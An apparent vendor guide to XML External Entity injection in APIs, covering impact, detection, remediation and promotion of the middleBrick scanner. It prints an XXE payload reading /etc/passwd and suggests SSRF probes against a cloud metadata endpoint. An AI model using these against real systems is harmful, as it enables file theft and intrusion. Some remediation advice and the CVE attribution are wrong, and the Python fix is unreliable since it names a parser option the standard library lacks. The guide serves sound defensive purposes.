HIGH Input Validation

Xml External Entities in APIs

What is Xml External Entities?

XML External Entity (XXE) injection is a vulnerability that occurs when an XML parser processes malicious XML input containing external entity references. XML entities are a way to define shortcuts for reuse within XML documents, but when external entities are allowed, attackers can craft payloads that cause the parser to access files, network resources, or other system components outside the intended scope.

The vulnerability stems from how XML processors handle the <!ENTITY> declaration. An external entity reference like <!ENTITY xxe SYSTEM "file:///etc/passwd"> tells the parser to load content from an external source. When the XML is parsed, this can lead to unauthorized file access, server-side request forgery (SSRF), or denial of service through resource exhaustion.

XXE attacks typically exploit three mechanisms: inline DTD (Document Type Definition) declarations, external DTD files, and parameter entities. The most dangerous scenario occurs when applications accept XML input with DTDs enabled and fail to disable external entity resolution, allowing attackers to manipulate the XML processing behavior.

How Xml External Entities Affects APIs

APIs that accept XML input are particularly vulnerable to XXE attacks when they use XML parsers without proper security configurations. The impact can be severe across multiple attack vectors:

File Disclosure: Attackers can read sensitive files from the server filesystem using file:// URIs, potentially exposing configuration files, user data, or application source code.
SSRF Attacks: External entity references using http:// or https:// protocols can force the server to make requests to internal network services, cloud metadata endpoints, or external systems, enabling network reconnaissance and data exfiltration.
Denial of Service: Malicious XML can trigger exponential entity expansion (the "billion laughs" attack) or excessive resource consumption through recursive entity references, overwhelming the server.
Port Scanning: By crafting external entities that attempt connections to various ports, attackers can map internal network services and identify potential targets.

In API contexts, XXE vulnerabilities often appear in SOAP endpoints, XML-based configuration uploads, XML-based data exchange formats, and any endpoint that processes XML documents without proper validation. The consequences range from data theft and service disruption to providing attackers with a foothold for deeper network compromise.

How to Detect Xml External Entities

Detecting XXE vulnerabilities requires both static analysis of XML processing code and dynamic testing of XML endpoints. Here are the key detection methods:

Static Analysis: Review XML parser configurations in your codebase. Look for parser initialization code that doesn't explicitly disable external entity processing. In Java, check for DocumentBuilderFactory instances without setExpandEntityReferences(false). In Python, verify that xml.sax or xml.etree.ElementTree is configured securely. In PHP, ensure libxml_disable_entity_loader(true) is called.

Dynamic Testing: Send crafted XML payloads to API endpoints that accept XML input. Test with payloads containing external entity references like:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>

Monitor for unexpected responses that might indicate successful entity resolution. Also test for SSRF by using http://169.254.169.254/latest/meta-data/ (AWS metadata endpoint) or other internal URLs.

middleBrick Scanning: middleBrick automatically tests for XXE vulnerabilities across all scanned endpoints. The scanner attempts to trigger external entity processing by sending payloads that reference both file system resources and network endpoints. It analyzes responses for signs of successful entity resolution, such as unexpected content in responses or timing differences that suggest network requests were made. The XXE check is part of middleBrick's comprehensive Input Validation assessment, helping you identify vulnerable endpoints without manual testing.

Prevention & Remediation

Preventing XXE vulnerabilities requires secure XML parser configuration and input validation. Here are concrete remediation steps for different platforms:

Java (JAXP): When creating XML parsers, explicitly disable external entity processing:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
DocumentBuilder db = dbf.newDocumentBuilder();

Python: Use secure parser configurations:

import xml.etree.ElementTree as ET
# For ElementTree, use the XML parser with entity expansion disabled
parser = ET.XMLParser(resolve_entities=False)
tree = ET.parse(xml_file, parser=parser)

PHP: Disable external entity loading:

libxml_disable_entity_loader(true);
$xml = simplexml_load_string($xml_string);

General Best Practices: Validate and sanitize all XML input before processing. Use allowlists for XML schemas and document structures. Implement input size limits to prevent DoS attacks. Consider using XML formats that don't support external entities, such as JSON, for new API designs. Regularly update XML libraries to ensure you have the latest security patches.

For APIs that must process XML documents with legitimate DTD requirements, implement strict content security policies, network isolation, and runtime monitoring to detect and block malicious entity references.

Real-World Impact

XXE vulnerabilities have caused significant security incidents across industries. In 2017, a major vulnerability in Java's Apache Commons Configuration library (CVE-2017-12629) allowed remote attackers to read arbitrary files via XXE attacks on applications using vulnerable versions. This affected numerous enterprise applications and required widespread patching.

The OWASP Top 10 lists XXE as a critical API security risk, and real-world exploitation continues to be reported. Attackers have used XXE to bypass authentication mechanisms, exfiltrate sensitive data from corporate networks, and gain initial access for larger attacks. The vulnerability is particularly dangerous because it often exists in the foundation of XML processing libraries, making it widespread across applications that use XML.

Financial services, healthcare, and government organizations have all experienced XXE-related incidents, with impacts ranging from data breaches to service outages. The cost of exploitation can include regulatory fines, reputational damage, and the resources required for incident response and remediation. Regular security scanning with tools like middleBrick helps organizations identify and address XXE vulnerabilities before attackers can exploit them.

Frequently Asked Questions

Can XXE attacks happen with JSON APIs?

No, XXE specifically targets XML parsers and their entity resolution mechanisms. JSON doesn't support external entity references or DTDs. However, APIs that accept both XML and JSON formats need to secure the XML processing paths. Some APIs might also have XML processing hidden in their implementation (like XML-based configuration files), so it's important to assess the entire attack surface, not just the API's primary data format.

How does middleBrick detect XXE vulnerabilities differently than other scanners?

middleBrick uses active probing techniques specifically designed to trigger XXE conditions. The scanner sends carefully crafted XML payloads that attempt to resolve both file system entities and network-based entities. It then analyzes response characteristics to determine if external entity resolution occurred. Unlike some scanners that only perform static analysis, middleBrick's black-box approach tests the actual runtime behavior of your API endpoints, providing more accurate results about whether the vulnerability is exploitable in your specific deployment.

Is disabling external entities enough to prevent all XML-based attacks?

Disabling external entities prevents XXE attacks but doesn't address all XML-related vulnerabilities. Other concerns include XML bomb attacks (billion laughs), quadratic blowup attacks, and issues with XML schema validation. You should also implement input size limits, use secure XML parsers with the latest security patches, and consider using safer formats like JSON when possible. A comprehensive XML security strategy includes both configuration hardening and input validation at multiple layers.